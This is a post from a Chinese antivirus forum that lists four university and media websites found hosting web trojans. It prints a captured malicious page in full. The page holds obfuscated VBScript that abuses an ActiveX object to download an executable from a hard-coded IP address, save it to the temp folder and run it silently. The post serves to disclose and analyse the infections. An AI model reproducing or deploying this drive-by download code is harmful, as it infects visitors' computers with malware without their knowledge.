瑞星卡卡安全论坛

网址均来自瑞星每日安全播报，我们详细分析其中所挂恶意网址，对于已失效的恶意网址就不再分析。

注：以下分析出的恶意网址均包含有真实网马下载地址，请勿直接下载并运行，以免系统中招。

1.  http://ciee.cau.edu.cn/(开放的中国农业大学欢迎您！)
2.  http://v.gxtv.cn/(广西电视网)
3.  http://gs.njtu.edu.cn/(北京交通大学)
4.  http://mec.dlmu.edu.cn/(大连海事大学)

<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="<script language="VBScript">

on error resume next

pil1 = "Scripting.FileSystemObject"

pil2 = "Shell.Application"

wj="wins.exe"

strl="Microsoft.XMLHTTP"

strl4="object"

strl5="Adodb.Stream"

strl6="GET"

strl7="classid"

pi8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

pi9 = "h000t000t000p://202.205.89.194/8.exe"



function chan(obt1)

chan=""

obt2 = len(obt1)

for i=1 to obt2 step 4

chan=chan+mid(obt1,i,1)

next

end function



pi1=chan(pil1)

pi2=chan(pil2)

str=chan(strl)

str4=chan(strl4)

str5=chan(strl5)

str6=chan(strl6)

str7=chan(strl7)

str8=chan(pi8)

dl=chan(pi9)



sub sub1(obt1,obt2)

df.setAttribute obt1,obt2

end sub

sub sub2(obt1,obt2,obt3,obt4,obt5,obt6)

obt1.type = obt3

obt2.Open obt4, obt5, obt6

obt2.Send

end sub

function fun1(obt1)

Set fun1 = document.createElement(obt1)

end function

function fun2(obt1)

set fun2 = df.createobject(obt1,"")

end function

sub fun3(obt1,obt2)

obt1.open

obt1.write obt2.responseBody

end sub

sub fun4(obt1,obt2,obt3)

obt1.savetofile obt2,obt3

end sub

function fun5(obt2,obt3)

set fun5 = obt2.createobject(obt3,"")

end function



Set df = fun1(str4)

sub1 str7,str8

Set x = fun2(Str)

set S = fun2(Str5)

sub2 S,x,1,str6,dl,false

call fun3(S,x)

fun4 S,fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),2

S.close

fun5(df,pi2).ShellExecute fun2(pi1).BuildPath(fun2(pi1).GetSpecialFolder(2),wj),"","","open",0



rem edit by labczm in cau



</script>





"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>